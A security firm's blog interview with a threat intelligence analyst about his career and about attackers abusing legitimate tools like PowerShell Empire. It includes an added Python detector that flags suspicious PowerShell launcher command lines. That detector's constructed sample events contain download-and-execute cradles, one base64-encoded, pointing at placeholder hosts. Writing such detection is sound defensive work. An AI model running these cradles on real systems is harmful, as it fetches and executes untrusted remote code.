Security Analyst Spotlight Series: Phil Doherty
January 10, 2019
Organizations rely on Digital Shadows to be an extension of their security team. Our global team of analysts provides relevant threat research, much-needed context, tailored remediation advice and managed takedown support to make our clients' jobs easier and more efficient. Crucially, by having analysts within the intelligence and collection cycle, we're able to minimize the real-time false positives that cause nightmares for most organizations.
In our Security Analyst Spotlight Series, we bring our analysts out of the shadows and into the spotlight, showcasing their expertise and interests so you can learn a bit more about a “day-in-the-life” of a Digital Shadows analyst.
Name: Phil Doherty
Team: Strategic Intelligence
Title: Strategic Intelligence Analyst
How did you get into cybersecurity?
While studying Countering Organised Crime and Terrorism I noticed that one of the main drivers for both is the proliferation of digital platforms. I then took up a module on Cyber Security and thought it was fascinating! I think it was how cyber intelligence is so broad yet interconnected that really drew me. In my job I’m able to swing between analyzing low-level attacks that organizations and individuals experience on a daily basis, sophisticated nation-state campaigns, and also the financially motivated organised crime from my academic background.
Currently, I am studying for the CompTIA Sec+ certificate and an Automating OSINT qualification, and doing additional research for educational institutions on matters of counter-terrorism and open-source procurement.
What advice would you give someone wanting to become an intelligence analyst?
For me, the most important thing is to have a genuine interest in what you are doing; intelligence work can be high intensity, so if you enjoy the subject, you’ll enjoy the work. You have to be ready to answer the “so what?” question with your research. Definitely read around the threat landscape and the major events that take place in the geographies and industries that interest you, trying to map the primary threat actors, their campaigns, and the techniques that they use.
What areas of cybersecurity are you most interested in and why?
Coming from an analytical background in criminology, I’ve always been drawn to the developments of organized crime and what drives it. When I started in cyber intelligence I loved mapping different threat actors and how they interlink on a local and national level. My interests also lie within geopolitics and how nation-state level associations affect both the physical and cyber threat landscape, so I do have a soft spot for military capabilities and state-level cyber attacks.
Recently I have focused on South-East Asia and China, and my research has centred on the proliferation of capabilities within this region. As the nations within this area are highly competitive against one another, there is likely an abundance of information yet to be unveiled about how threat actors collaborate. This region is highly volatile and shifting daily, which is something I love about the cyber-security industry as a whole.
What has been your favourite project or investigation to work on?
Fortunately, the role of an analyst opens you up to a variety of topics and investigations. My favourites have to be those that surround upcoming geopolitical events and international conferences. These events attract attention from a wide range of threat actors, allowing me to both quantitatively and qualitatively assess the likelihood of these events – or specific attendees – being directly or indirectly targeted. One example was assessing the cyber threats to an international economics summit in Asia attended by the world's largest financial institutions, corporations and government representatives.
Also, I enjoy tracking the developments of specific threat actors and building a profile of their tactics, techniques and procedures (TTPs). By tracing these threat actors, you can better understand how they choose their targets, what tactics they use, and what the real impact of their attacks is. This knowledge is invaluable during live investigations, such as when a client receives a ransom demand and needs assistance verifying the actor's capabilities before deciding how to respond.
What are the most significant cybersecurity trends that organizations should be aware of?
As all cyber security experts are aware, vulnerabilities are used by threat actors to gain a foothold within a system and move laterally across the wider network. Individually, these vulnerabilities may appear low-level, but can often become incredibly serious when leveraged alongside others. Understanding what your most critical systems are, and where they are vulnerable, is key to deciding on what to prioritize from a patching perspective.
Recently there has been an increase in reports of threat actors using legitimate penetration-testing and administration utilities to escalate their privileges and access sensitive data. These utilities are particularly difficult to detect, as anti-virus software often fails to report them as malicious because they are typically installed by default by the device provider or have been designed by Red Teams to avoid detection. Businesses should pay close attention to these utilities and only use them if consistently necessary.
Both of the above can be used simultaneously to infect a system. The use of legitimate tools such as PowerShell Empire and Veil Framework, alongside system vulnerabilities, can be a significant risk to organizations given their widespread use. More should be done to ensure that these organizations have up-to-date systems and only use these tools if necessary.
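The answer above notes that anti-virus rarely flags these tools because the binaries themselves are legitimate. The usual counter is to alert on how the tool is invoked rather than on the binary. What follows is an added example, not part of Phil's answer and not Digital Shadows' tooling, that scores PowerShell process-creation command lines for launcher traits: an encoded command, a hidden window, a profile or execution-policy bypass, and a download cradle or in-memory execution in the recovered script text. The parameter table (a permissive prefix match plus the `-ep` alias), the indicator names, the threshold of three indicators, the `example.invalid` URLs and the four sample events are all this example's own assumptions and constructed data.

```python
"""Score PowerShell process-creation command lines for launcher traits.

Added example, not code from the interview or from Digital Shadows. The
parameter table, indicator names and threshold are assumptions; the events
at the bottom are constructed, not real telemetry.
"""
import base64
import binascii
import re
import shlex

# powershell.exe accepts abbreviated switches ("-enc", "-ec" and "-e" all
# select -EncodedCommand). This table is a permissive prefix match with the
# first entry winning on a clash; real parsing is stricter, but this is
# enough for triage. "-ep" is a documented alias, not a prefix, so it is
# listed separately.
PARAM_ORDER = ("encodedcommand", "executionpolicy", "noprofile", "nologo",
               "noninteractive", "windowstyle", "command", "file", "sta")
ALIASES = {"ep": "executionpolicy"}
VALUE_PARAMS = {"encodedcommand", "executionpolicy", "windowstyle",
                "command", "file"}

# Script-content indicators typical of a launcher: fetch a second stage
# over HTTP and run it in memory without writing to disk.
SCRIPT_PATTERNS = {
    "download cradle": re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b",
        re.I),
    "in-memory execution": re.compile(
        r"\biex\b|invoke-expression|frombase64string", re.I),
}
SUSPICION_THRESHOLD = 3  # assumption: three or more indicators raise an alert


def normalize_param(token):
    """Expand an abbreviated switch such as '-noP' to 'noprofile', else None."""
    if not token.startswith("-") or len(token) < 2:
        return None
    name = token[1:].lower()
    if name in ALIASES:
        return ALIASES[name]
    for param in PARAM_ORDER:
        if param.startswith(name):
            return param
    return None


def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def encode_for_powershell(script):
    """Produce the -EncodedCommand form of a script (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_command_line(cmdline):
    """Return indicators, the recovered script text and a verdict."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keep Windows quoting intact
    except ValueError:
        tokens = cmdline.split()
    indicators, script = [], ""
    i = 1  # token 0 is the image path
    while i < len(tokens):
        param = normalize_param(tokens[i])
        takes_value = param in VALUE_PARAMS
        value = tokens[i + 1] if takes_value and i + 1 < len(tokens) else ""
        if param == "encodedcommand":
            indicators.append("encoded command")
            decoded = decode_encoded_command(value)
            if decoded is None:
                indicators.append("undecodable encoded command")
            else:
                script = decoded
        elif param == "windowstyle" and value.lower() in ("hidden", "1"):
            indicators.append("hidden window")
        elif param == "executionpolicy" and value.lower() in ("bypass", "unrestricted"):
            indicators.append("execution policy bypass")
        elif param == "noprofile":
            indicators.append("no profile")
        elif param == "command":
            script = " ".join(tokens[i + 1:])  # -Command consumes the rest of the line
            break
        i += 2 if takes_value else 1
    for label, pattern in SCRIPT_PATTERNS.items():
        if pattern.search(script):
            indicators.append(label)
    return {"indicators": indicators, "script": script,
            "suspicious": len(indicators) >= SUSPICION_THRESHOLD}


# Constructed process-creation events (name, command line); not real logs.
SAMPLE_EVENTS = [
    ("empire-style launcher",
     "powershell.exe -noP -sta -w 1 -enc " + encode_for_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/launcher')")),
    ("plaintext cradle",
     "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/a')\""),
    ("scheduled backup script",
     r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ("interactive admin query",
     "powershell.exe -Command \"Get-Service | Where-Object Status -eq 'Running'\""),
]


def triage(events):
    """Names of the events that cross the suspicion threshold, in order."""
    return [name for name, cmdline in events
            if analyze_command_line(cmdline)["suspicious"]]


if __name__ == "__main__":
    for name, cmdline in SAMPLE_EVENTS:
        result = analyze_command_line(cmdline)
        print(f"{name:26} suspicious={result['suspicious']} {result['indicators']}")
```

Run as a script it prints one line per sample event; the two launcher-style lines cross the threshold while the scheduled backup (two indicators) and the interactive query (none) do not. The point of decoding `-EncodedCommand` before matching is that the base64 wrapper hides the cradle from any signature that only looks at the raw command line; the point of the threshold is that each switch on its own is legitimate administrative usage.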
Phil is a Strategic Intelligence Analyst within Digital Shadows’ Strategic Intelligence team, where he closely follows international threat developments in South-East Asia and China. He holds a BA in Criminology and Psychology from Leeds and an MSc in Countering Organised Crime and Terrorism from University College London.
To stay up to date with the latest digital risk and threat intelligence news, subscribe to our threat intelligence emails here.